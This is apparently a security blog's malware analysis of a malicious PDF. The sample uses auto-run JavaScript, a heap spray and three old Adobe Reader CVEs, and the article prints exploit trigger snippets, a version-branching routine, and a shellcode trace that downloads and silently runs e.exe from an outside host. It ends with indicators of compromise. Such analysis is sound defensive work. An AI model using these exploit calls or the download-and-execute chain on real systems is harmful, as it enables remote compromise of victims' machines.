Adobe PDF Exploit
In the malware landscape, PDF documents have long been one of the most popular attack vectors. Thanks to vulnerabilities in Adobe Reader and its plugins, a seemingly harmless file can become the entry point to compromise a system.
In this article, we will analyze a real malicious PDF that exploits different vulnerabilities depending on the version of the reader installed, and we’ll see how it integrates a very compact shellcode (104 bytes) to download and execute a remote payload.
Sample Identification and Initial Triage
The malicious file under analysis is a PDF version 1.3 with a size of just 17 KB. At first glance, it doesn’t include Flash objects or embedded multimedia, but we quickly identified several JavaScript streams hidden inside the document. These scripts are automatically triggered through the /OpenAction
directive, ensuring that the malicious code executes as soon as the file is opened in Adobe Reader.
To fingerprint the sample, we calculated the following hashes:
- MD5:
9e4938009e8d3b06442b727e73a7958c
- SHA-1:
139ac50c3f7e2def20be4077a59941235e0098ff
- SHA-256:
0b3b3b22c8a6e3474150ea1cb8ab494413d3a641d475916114b8c4a94393f753
A check in VirusTotal showed a high detection rate across multiple AV engines, confirming that the document was already flagged as malicious.
The internal structure analysis using PDFStreamDumper revealed three suspicious JavaScript objects, clearly pointing to an intentional exploitation setup rather than a benign document.
Using the collected information, we can summarize the metadata extracted from the online sandbox:
Field | Value |
---|---|
MD5 | 9e4938009e8d3b06442b727e73a7958c |
SHA-1 | 139ac50c3f7e2def20be4077a59941235e0098ff |
SHA-256 | 0b3b3b22c8a6e3474150ea1cb8ab494413d3a641d475916114b8c4a94393f753 |
Vhash | 92ed1bde3b4201a28f31eb183acad4fc8 |
SSDEEP | 192:T0G2mJhASZy09x86Oly09x8Dvj5lRZly09x8SRZkjXmdfRZo5suB:THJPZy09x8Dly09x8/5hly09x8y1o5T |
TLSH | T198726952AF9813A598604DF52349361724F2DE2F28D9319AE6D11E73B03EB13ECE9374 |
File Type | PDF, document, pdf |
Magic | PDF document, version 1.3, 0 pages |
TrID | Adobe Portable Document Format (100 %) |
File Size | 17.06 KB (17,467 bytes) |
The file is identified as a PDF document, version 1.3, with a total size of 17,467 bytes. No Flash objects or multimedia traces were observed, other than the three JavaScript streams. The object structure clearly indicates the deliberate use of /OpenAction
in the root object, designed to trigger malicious code execution as soon as the PDF is opened.
Execution Flow of the Malicious PDF
The execution of the malware inside the PDF can be divided into several stages:
Phase 1 – Automatic Trigger
When the PDF is opened, the viewer processes the following entry in object 1:
1
/OpenAction << /JS (this.BXcfTYewQ()) /S /JavaScript >>
This directive ensures that the function BXcfTYewQ() is immediately executed in the Adobe Reader context.
Phase 2 – Deobfuscation and Dynamic Definition
The actual definition of BXcfTYewQ is located in object 13, wrapped in two layers of eval
and a large String.fromCharCode(...)
block that reconstructs the full script at runtime.
Once beautified with a tool like JS Beautifier, the code becomes more legible. We can then see that it dynamically defines:
- Auxiliary functions (
util_printf
,collab_email
,collab_geticon
,pdf_start
). - Shellcode injection via
unescape()
and preparation of a heap spray.
These functions contain the logic to exploit various Adobe Reader vulnerabilities (CVEs). The script ends by calling:
1
pdf_start();
Phase 3 – PDF Reader Version Detection
Inside pdf_start()
, the script retrieves the version of Adobe Reader:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
function pdf_start() {
var version = app.viewerVersion.toString();
version = version.replace(/\D/g, '');
var varsion_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2));
if ((varsion_array[0] == 8) && (varsion_array[1] == 0) ||
(varsion_array[1] == 1 && varsion_array[2] < 3)) {
util_printf();
}
if ((varsion_array[0] < 8) ||
(varsion_array[0] == 8 && varsion_array[1] < 2 && varsion_array[2] < 2)) {
collab_email();
}
if ((varsion_array[0] < 9) ||
(varsion_array[0] == 9 && varsion_array[1] < 1)) {
collab_geticon();
}
}
For example, version “8.1.1” is converted into “811” for numerical comparison, allowing the script to branch the attack depending on the environment.
Phase 4 – Selection of the Attack Vector
Depending on the detected version, one of three exploits is triggered:
Option A – util_printf() (CVE-2008-2992)
Applicable to versions 8.0.0–8.1.2.
A heap spray is prepared with 0x40000-byte blocks containing a NOP sled and the shellcode. Then the function call:1
util.printf("%45000f", num);
This overflows the internal buffer of
printf
, redirecting execution into the sprayed shellcode (RCE).Option B – collab_email() (CVE-2007-5659)
Used as a fallback if the version is older than 8.1.1 but does not match the first condition.
It abuses:1
collab.collectEmailInfo({ subj:"", msg:overflow });
The overflow occurs in the
msg
field, again redirecting execution to the same shellcode.Option C – collab_geticon() (CVE-2009-0927)
Used as a last resort if Adobe Reader is older than 9.1 and the previous attempts fail.
The exploit is triggered with:1
app.doc.Collab.getIcon(overflowString);
In some cases, this results in fingerprinting or a DoS condition in vulnerable readers.
Adobe Reader Version | Exploit Used | Expected Result |
---|---|---|
8.0.0 – 8.1.2 | util.printf() | Remote Code Execution |
< 8.1.1 | collab_email() | Remote Code Execution |
< 9.1 | collab_geticon() | Possible RCE / DoS |
≥ 9.1 | None | No effect |
Embedded Shellcode Analysis
The obfuscated JavaScript inside the PDF builds a heap spray that embeds the payload as sequences of %uXXXX
. To extract it, we used a small Python script that:
- Reads the obfuscated JavaScript and finds all
%uXXXX
occurrences. - For each
XXXX
, swaps the byte order (e.g.,0x1234 -> 34 12
). - Concatenates all results into a byte array.
- Saves the output into shellcode.bin.
As a result, we obtained a 104-byte binary.
Static Analysis in IDA
Loading shellcode.bin into IDA reveals a compact but fully functional flow:
- Dynamic API resolution – No direct imports; instead, the code walks the PEB to locate
kernel32.dll
andurlmon.dll
, then computes function name hashes from the Export Table and compares them against precomputed values. - Runtime string construction – Paths like
%TEMP%\e.exe
and the remote URL are assembled byte by byte using instructions such asstosb
,stosw
, andstosd
. - Download & execution logic – After resolving
URLDownloadToFileA
andWinExec
, the shellcode downloads the payload and executes it withSW_HIDE
, finally callingExitThread(0)
.
Remarkably, the author fit all this functionality into only 104 bytes, implementing ROR13 hashing and avoiding static references to make AV detection more difficult.
PEB Walking and Function Hashing
The routine that resolves APIs begins by reading the fs:[30h] segment register to obtain the PEB address. From there:
- It accesses
PEB->Ldr.InInitializationOrderModuleList
to iterate loaded modules. - For each entry (
LDR_DATA_TABLE_ENTRY
), it retrieves the module name (e.g., kernel32.dll). It walks the Export Directory, extracts each function name, and computes a rolling ROR13 hash:
1
hash = ROR(hash, 13) XOR character
Example of resolved hashes:
Function | Hash (hex) |
---|---|
GetTempPathA | 5B8ACA33 |
LoadLibraryA | EC0E4E8E |
URLDownloadToFileA | 702F1A36 |
WinExec | 0E8AFE98 |
ExitThread | 60E0CEEF |
- If the computed hash matches one hardcoded in the shellcode, the function pointer is retrieved.
This technique keeps the shellcode independent of absolute addresses and avoids visible import tables.
Controlled Execution with scDbg
To safely validate execution, we used scDbg with interactive hooks and memory monitoring. Running shellcode.bin
at base address 0x401000 produced the following trace:
1
2
3
4
5
6
7
401086 GetTempPathA(len=88, buf=0x12fd80) = 25
4010B0 LoadLibraryA("urlmon.dll")
4010CA URLDownloadToFileA(
"http://juvitec.net/css/load.php?e=2",
"C:\\Users\\vboxuser\\AppData\\Local\\Temp\\e.exe",0,0)
4010D7 WinExec("C:\\Users\\vboxuser\\AppData\\Local\\Temp\\e.exe", SW_HIDE)
4010E0 ExitThread(0)
We also observed access to fs:[30h] and reads of the module list, confirming the same behavior described in the static analysis.
Indicators of Compromise (IOCs)
During the analysis, several artifacts were identified that can serve as Indicators of Compromise (IOCs). These help blue teams and incident responders detect whether this exploit or its payload has been executed in their environment.
Type | Value |
---|---|
MD5 (PDF) | 9e4938009e8d3b06442b727e73a7958c |
SHA-1 (PDF) | 139ac50c3f7e2def20be4077a59941235e0098ff |
SHA-256 (PDF) | 0b3b3b22c8a6e3474150ea1cb8ab494413d3a641d475916114b8c4a94393f753 |
Malicious URL | hxxp://juvitec.net/css/load.php?e=2 |
Dropped File | %TEMP%\e.exe |
Exploit Techniques | CVE-2008-2992 (util.printf), CVE-2007-5659 (collab.collectEmailInfo), CVE-2009-0927 (collab.getIcon) |